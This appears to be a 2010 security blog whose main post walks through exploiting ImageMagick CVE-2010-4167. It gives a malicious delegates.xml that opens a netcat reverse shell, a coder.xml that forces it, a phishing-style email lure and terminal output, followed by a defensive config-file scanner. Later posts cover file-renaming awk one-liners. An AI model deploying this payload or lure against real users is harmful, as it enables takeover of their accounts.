Thursday, December 30, 2010

Funny ImageMagick CMD Injection

Sometimes I don't read vendors' vulnerability reports, because they are so boring and don't give technical information about the vulnerability. The other day I read an Ubuntu Security Notice and it seemed interesting. First I read the description section; it says:
"It was discovered that ImageMagick would search for configuration files in
the current directory. If a user were tricked into opening or processing an
image in an arbitrary directory, a local attacker could execute arbitrary
code with the user's privileges." [1]

After that I searched for the CVE ID of the vulnerability, CVE-2010-4167. If I hadn't found anything I would have reviewed the diff files, but the Debian bug tracking page helped me. [2]
I always believe that bug tracking systems are very useful for finding security bugs and developing exploits.

The bug report was right: ImageMagick also searched the current working directory for its configuration files, and whatever it found there was merged into its configuration. So if you can place a malicious config file in a directory and get your target to run the "convert" binary in that directory, you can execute commands with that user's privileges.

We create malicious XML config files that execute commands in the current user's context. In the example I run netcat to get a reverse shell :-) I send them by mail to my victim:
"Hello dear, I need to convert my png file to jpg and I can't access my computer now, can you do it for me? I attached the png file.."

If my victim opens it (in this case he will open it :P) my arbitrary code will be executed on the system.

Victim:
[victim@vmware:~/img]$ unzip please_convert.zip
... snipped ...
[victim@vmware:~/img]$ convert x.png a.jpg
convert: unable to open image `/tmp/magick-XXFJtZIk': No such file or directory @ blob.c/OpenBlob/2480.
convert: unable to open file `/tmp/magick-XXFJtZIk': No such file or directory @ constitute.c/ReadImage/569.
convert: missing an image filename `a.jpg' @ convert.c/ConvertImageCommand/2838.


Attacker:
[cb@lab:~/imagemagic-Xploi7]$ nc.traditional -lvvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 37267
ls
coder.xml
delegates.xml
sshoos
xploit.txt
x.png
echo "owned :P"
owned :P
exit
 sent 24, rcvd 57



Here is the example delegates.xml file (the name must match what ImageMagick loads; note the ls output above):
<delegatemap>
<delegate decode='png' command="nc.traditional -e /bin/sh 127.0.0.1 1337"/>
</delegatemap>

and here is the example coder.xml file:
<codermap>
<coder magick='png' name='notpng'/>
</codermap>


Note: delegates.xml on its own is not enough. ImageMagick only falls back to a delegate when it has no built-in coder for the format, so coder.xml remaps 'png' to a coder name that does not exist; the PNG decoder is then skipped and the delegate command runs instead. The delegate never writes an output file, which is why convert complains about the missing /tmp/magick-... file in the victim's output above. To see which directories your own build searches, run convert with the configure debug channel, e.g. convert -debug configure x.png null:, and check that the current directory is not among the paths it tries; a patched build should not look there.
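A practitioner-side check to go with the above: a small scanner that audits a directory, for instance an unpacked please_convert.zip, for planted ImageMagick configuration files and reports what they would do. This is an added example, not code from the original post or from ImageMagick; it assumes only the standard configuration file names ImageMagick loads (delegates.xml, coder.xml and the others listed in the script) and the element and attribute layout shown in the two files above. The sample directory it builds is constructed inline, so it runs offline without ImageMagick installed.

```python
"""Audit a directory for planted ImageMagick configuration files.

Added example for this post (not ImageMagick's own code). On an unpatched
build, any of these file names sitting next to user-supplied images is a
red flag, because they are merged into the configuration when convert runs
in that directory.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Configuration files ImageMagick reads from its search path. The set is an
# assumption based on a standard install; a deployment may ship more of them.
IMAGEMAGICK_CONFIG_NAMES = {
    "coder.xml", "colors.xml", "delegates.xml", "log.xml", "magic.xml",
    "mime.xml", "policy.xml", "thresholds.xml", "type.xml",
}

# The two files from the post, reproduced here as constructed sample input.
SAMPLE_DELEGATES_XML = """<delegatemap>
<delegate decode='png' command="nc.traditional -e /bin/sh 127.0.0.1 1337"/>
</delegatemap>
"""
SAMPLE_CODER_XML = """<codermap>
<coder magick='png' name='notpng'/>
</codermap>
"""


def audit_directory(path):
    """Return a list of (filename, detail) findings for config files in path.

    delegates.xml entries are reported with the command they would run,
    coder.xml entries with the format they remap; any other known config
    file is reported as present. Unparseable XML is reported too, since a
    broken file is still evidence of tampering.
    """
    findings = []
    for name in sorted(os.listdir(path)):
        lowered = name.lower()
        # Lookup is case-sensitive on Linux, but odd casing is worth flagging.
        if lowered not in IMAGEMAGICK_CONFIG_NAMES:
            continue
        full = os.path.join(path, name)
        try:
            root = ET.parse(full).getroot()
        except ET.ParseError as exc:
            findings.append((name, "unparseable XML (%s)" % exc))
            continue
        if lowered == "delegates.xml":
            for d in root.iter("delegate"):
                fmt = d.get("decode") or d.get("encode") or "?"
                findings.append((name, "delegate for '%s' runs: %s"
                                 % (fmt, d.get("command", ""))))
        elif lowered == "coder.xml":
            for c in root.iter("coder"):
                findings.append((name, "format '%s' remapped to coder '%s'"
                                 % (c.get("magick"), c.get("name"))))
        else:
            findings.append((name, "ImageMagick config file present"))
    return findings


def build_sample_dir(include_configs=True):
    """Create a temp dir imitating the unpacked archive; return its path."""
    path = tempfile.mkdtemp(prefix="please_convert_")
    # Placeholder standing in for x.png; the image content is irrelevant here.
    with open(os.path.join(path, "x.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n")
    if include_configs:
        with open(os.path.join(path, "delegates.xml"), "w") as f:
            f.write(SAMPLE_DELEGATES_XML)
        with open(os.path.join(path, "coder.xml"), "w") as f:
            f.write(SAMPLE_CODER_XML)
    return path


if __name__ == "__main__":
    # Demo against the constructed directory; point audit_directory() at a
    # real unpacked archive to use it for real.
    for fname, detail in audit_directory(build_sample_dir()):
        print("%-14s %s" % (fname, detail))
```

Run it on the directory you were asked to convert images in, before running convert there; a delegates.xml finding shows the exact command that would have been executed, and a coder.xml finding shows which format's decoder was being sidelined to force that delegate.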

References:
[1] - http://www.ubuntu.com/usn/usn-1028-1
[2] - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=601824

Wednesday, December 29, 2010

Özgür Yazılım Günleri 2011

Özgür Yazılım Günleri (Free Software Days) is on 1-2 April; barring any mishap I'll be attending too, and friends who are going can take the chance to meet up if they like. I've put the logo on the right in support; anyone curious can click it, read, look around and learn.

Anyway, see you there :)

Thursday, December 16, 2010

Gelişmiş File Inclusion Saldırıları (Advanced File Inclusion Attacks)

An article I wrote a while ago, which we published on the ADEO Security Labs blog; I finally converted it to PDF and added it to my blog as well :>

Anyone who wants to read it can get it from the address below, as the file AFIA.pdf.
https://sites.google.com/site/canberkbolat/papers

Saturday, December 11, 2010

awk awk

It's been a long time since I last wrote :) I've been playing with awk a bit; it's great fun, I can recommend it :) Briefly, here's what I did: first I removed unwanted characters from the names of the mp3 files in a directory ("_" is a character I find repulsive). It can be done with sed as well, but I did it with awk, so that's what I'll write up :]

ls | awk -F. '{a=$0; gsub(/_/," "); gsub(/ *- */," - "); if ($1".mp3" != a) print "mv \""a"\" \""$1".mp3\""}' | sh

So they look nice, I also added a space to the left and right of the "-" character with the same command (matching any spaces already around the dash, so an existing " - " is not doubled), and the mv is only printed when the name actually changes. I redirected the pipe into the shell so that it runs the mv commands. Then I thought I'd apply ucfirst, familiar from PHP. A ucfirst equivalent in awk is a bit fiddly :) I handled that too with the command below; it keeps the original name for the mv source and rebuilds the new name word by word:

ls | awk '{n=split($0, w, " "); b=""; for (i=1; i<=n; i++) b=b (i>1 ? " " : "") toupper(substr(w[i],1,1)) substr(w[i],2); if (b != $0) print "mv \""$0"\" \""b"\""}' | sh

Done, now my files look the way I want :)
hcr@world:~/desktop/Dexter - Soundtracks$ ls 01*
01 - Rolfe Kent - Dexter Main Title.mp3

Yes, I care a lot about order and control..